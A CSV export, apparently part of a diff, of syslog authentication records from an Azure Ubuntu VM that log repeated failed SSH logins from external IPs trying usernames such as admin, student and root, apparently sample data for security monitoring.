+12126,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:07:09,UbuntuDevEnv,2019-06-26 02:07:08,auth,UbuntuDevEnv,info,Disconnected from invalid user max 51.77.140.111 port 32836 [preauth],95218,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,max,51.77.140.1,32836,,
+12127,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:07:09,UbuntuDevEnv,2019-06-26 02:07:08,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 32836:11: Bye Bye [preauth],95218,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,32836,,
+12128,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:07:19,UbuntuDevEnv,2019-06-26 02:07:19,auth,UbuntuDevEnv,info,Invalid user miller from 131.108.48.151 port 36401,95264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miller,131.108.48.1,36401,,
+12129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:07:20,UbuntuDevEnv,2019-06-26 02:07:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=131.108.48.151,95264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,131.108.48.1,,0,
+12130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:07:20,UbuntuDevEnv,2019-06-26 02:07:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:07:22,UbuntuDevEnv,2019-06-26 02:07:21,auth,UbuntuDevEnv,info,Failed password for invalid user miller from 131.108.48.151 port 36401 ssh2,95264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miller,131.108.48.1,36401,,
+12132,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:07:22,UbuntuDevEnv,2019-06-26 02:07:21,auth,UbuntuDevEnv,info,Disconnected from invalid user miller 131.108.48.151 port 36401 [preauth],95264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,miller,131.108.48.1,36401,,
+12133,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:07:22,UbuntuDevEnv,2019-06-26 02:07:21,auth,UbuntuDevEnv,info,Received disconnect from 131.108.48.151 port 36401:11: Bye Bye [preauth],95264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,131.108.48.1,36401,,
+12134,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:08:36,UbuntuDevEnv,2019-06-26 02:08:35,auth,UbuntuDevEnv,info,Invalid user braxton from 51.77.140.111 port 49794,95536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,braxton,51.77.140.1,49794,,
+12135,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:08:36,UbuntuDevEnv,2019-06-26 02:08:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12136,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:08:36,UbuntuDevEnv,2019-06-26 02:08:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,95536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+12137,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:08:38,UbuntuDevEnv,2019-06-26 02:08:37,auth,UbuntuDevEnv,info,Failed password for invalid user braxton from 51.77.140.111 port 49794 ssh2,95536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,braxton,51.77.140.1,49794,,
+12138,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:08:38,UbuntuDevEnv,2019-06-26 02:08:37,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 49794:11: Bye Bye [preauth],95536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,49794,,
+12139,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:08:38,UbuntuDevEnv,2019-06-26 02:08:37,auth,UbuntuDevEnv,info,Disconnected from invalid user braxton 51.77.140.111 port 49794 [preauth],95536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,braxton,51.77.140.1,49794,,
+12140,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:10:03,UbuntuDevEnv,2019-06-26 02:10:03,auth,UbuntuDevEnv,info,Invalid user noah from 51.77.140.111 port 38520,95846,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,noah,51.77.140.1,38520,,
+12141,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:10:03,UbuntuDevEnv,2019-06-26 02:10:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,95846,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12142,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:10:03,UbuntuDevEnv,2019-06-26 02:10:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,95846,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+12143,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:10:05,UbuntuDevEnv,2019-06-26 02:10:05,auth,UbuntuDevEnv,info,Failed password for invalid user noah from 51.77.140.111 port 38520 ssh2,95846,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,noah,51.77.140.1,38520,,
+12144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:10:06,UbuntuDevEnv,2019-06-26 02:10:05,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 38520:11: Bye Bye [preauth],95846,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,38520,,
+12145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:10:06,UbuntuDevEnv,2019-06-26 02:10:05,auth,UbuntuDevEnv,info,Disconnected from invalid user noah 51.77.140.111 port 38520 [preauth],95846,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,noah,51.77.140.1,38520,,
+12146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:11:31,UbuntuDevEnv,2019-06-26 02:11:31,auth,UbuntuDevEnv,info,Invalid user student from 51.77.140.111 port 55480,96149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student,51.77.140.1,55480,,
+12147,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:11:31,UbuntuDevEnv,2019-06-26 02:11:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12148,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:11:31,UbuntuDevEnv,2019-06-26 02:11:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,96149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+12149,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:11:33,UbuntuDevEnv,2019-06-26 02:11:33,auth,UbuntuDevEnv,info,Failed password for invalid user student from 51.77.140.111 port 55480 ssh2,96149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student,51.77.140.1,55480,,
+12150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:11:33,UbuntuDevEnv,2019-06-26 02:11:33,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 55480:11: Bye Bye [preauth],96149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,55480,,
+12151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:11:33,UbuntuDevEnv,2019-06-26 02:11:33,auth,UbuntuDevEnv,info,Disconnected from invalid user student 51.77.140.111 port 55480 [preauth],96149,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,student,51.77.140.1,55480,,
+12152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:12:57,UbuntuDevEnv,2019-06-26 02:12:56,auth,UbuntuDevEnv,info,Invalid user ccapp from 51.77.140.111 port 44206,96459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ccapp,51.77.140.1,44206,,
+12153,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:12:57,UbuntuDevEnv,2019-06-26 02:12:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,96459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+12154,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:12:57,UbuntuDevEnv,2019-06-26 02:12:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12155,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:12:59,UbuntuDevEnv,2019-06-26 02:12:58,auth,UbuntuDevEnv,info,Failed password for invalid user ccapp from 51.77.140.111 port 44206 ssh2,96459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ccapp,51.77.140.1,44206,,
+12156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:12:59,UbuntuDevEnv,2019-06-26 02:12:58,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 44206:11: Bye Bye [preauth],96459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,44206,,
+12157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:12:59,UbuntuDevEnv,2019-06-26 02:12:58,auth,UbuntuDevEnv,info,Disconnected from invalid user ccapp 51.77.140.111 port 44206 [preauth],96459,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ccapp,51.77.140.1,44206,,
+12158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:14:24,UbuntuDevEnv,2019-06-26 02:14:23,auth,UbuntuDevEnv,info,Invalid user admin from 51.77.140.111 port 32936,96758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,51.77.140.1,32936,,
+12159,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:14:24,UbuntuDevEnv,2019-06-26 02:14:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,96758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12160,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:14:24,UbuntuDevEnv,2019-06-26 02:14:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,96758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+12161,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:14:25,UbuntuDevEnv,2019-06-26 02:14:25,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 51.77.140.111 port 32936 ssh2,96758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,51.77.140.1,32936,,
+12162,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:14:25,UbuntuDevEnv,2019-06-26 02:14:25,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 51.77.140.111 port 32936 [preauth],96758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,51.77.140.1,32936,,
+12163,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:14:25,UbuntuDevEnv,2019-06-26 02:14:25,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 32936:11: Bye Bye [preauth],96758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,32936,,
+12164,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:15:52,UbuntuDevEnv,2019-06-26 02:15:52,auth,UbuntuDevEnv,info,Invalid user ivo from 51.77.140.111 port 49894,97162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ivo,51.77.140.1,49894,,
+12165,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:15:52,UbuntuDevEnv,2019-06-26 02:15:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,97162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+12166,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:15:52,UbuntuDevEnv,2019-06-26 02:15:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,97162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12167,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:15:54,UbuntuDevEnv,2019-06-26 02:15:54,auth,UbuntuDevEnv,info,Failed password for invalid user ivo from 51.77.140.111 port 49894 ssh2,97162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ivo,51.77.140.1,49894,,
+12168,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:15:54,UbuntuDevEnv,2019-06-26 02:15:54,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 49894:11: Bye Bye [preauth],97162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,49894,,
+12169,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:15:54,UbuntuDevEnv,2019-06-26 02:15:54,auth,UbuntuDevEnv,info,Disconnected from invalid user ivo 51.77.140.111 port 49894 [preauth],97162,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ivo,51.77.140.1,49894,,
+12170,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:17:23,UbuntuDevEnv,2019-06-26 02:17:22,auth,UbuntuDevEnv,info,Invalid user shuo from 51.77.140.111 port 38620,97483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shuo,51.77.140.1,38620,,
+12171,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:17:23,UbuntuDevEnv,2019-06-26 02:17:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,97483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+12172,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:17:23,UbuntuDevEnv,2019-06-26 02:17:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111,97483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,51.77.140.1,,0,
+12173,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:17:24,UbuntuDevEnv,2019-06-26 02:17:24,auth,UbuntuDevEnv,info,Failed password for invalid user shuo from 51.77.140.111 port 38620 ssh2,97483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shuo,51.77.140.1,38620,,
+12174,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:17:24,UbuntuDevEnv,2019-06-26 02:17:24,auth,UbuntuDevEnv,info,Disconnected from invalid user shuo 51.77.140.111 port 38620 [preauth],97483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,shuo,51.77.140.1,38620,,
+12175,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:17:24,UbuntuDevEnv,2019-06-26 02:17:24,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 38620:11: Bye Bye [preauth],97483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,38620,,
+12176,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:18:49,UbuntuDevEnv,2019-06-26 02:18:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111  user=root,98170,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,51.77.140.1,,0,
+12177,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:18:51,UbuntuDevEnv,2019-06-26 02:18:50,auth,UbuntuDevEnv,info,Failed password for root from 51.77.140.111 port 55582 ssh2,98170,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,55582,,
+12178,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:18:51,UbuntuDevEnv,2019-06-26 02:18:50,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 51.77.140.111 port 55582 [preauth],98170,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,51.77.140.1,55582,,
+12179,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:18:51,UbuntuDevEnv,2019-06-26 02:18:50,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 55582:11: Bye Bye [preauth],98170,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,55582,,
+12180,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:20:13,UbuntuDevEnv,2019-06-26 02:20:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=51.77.140.111  user=root,98483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,51.77.140.1,,0,
+12181,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:20:15,UbuntuDevEnv,2019-06-26 02:20:15,auth,UbuntuDevEnv,info,Failed password for root from 51.77.140.111 port 44308 ssh2,98483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,44308,,
+12182,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:20:15,UbuntuDevEnv,2019-06-26 02:20:15,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 51.77.140.111 port 44308 [preauth],98483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,51.77.140.1,44308,,
+12183,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:20:15,UbuntuDevEnv,2019-06-26 02:20:15,auth,UbuntuDevEnv,info,Received disconnect from 51.77.140.111 port 44308:11: Bye Bye [preauth],98483,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,51.77.140.1,44308,,
+12184,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:25:52,UbuntuDevEnv,2019-06-26 02:25:51,auth,UbuntuDevEnv,info,Invalid user minigames from 178.60.39.61 port 64865,99667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,minigames,178.60.39.6,64865,,
+12185,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 02:25:52,UbuntuDevEnv,2019-06-26 02:25:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,99667,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
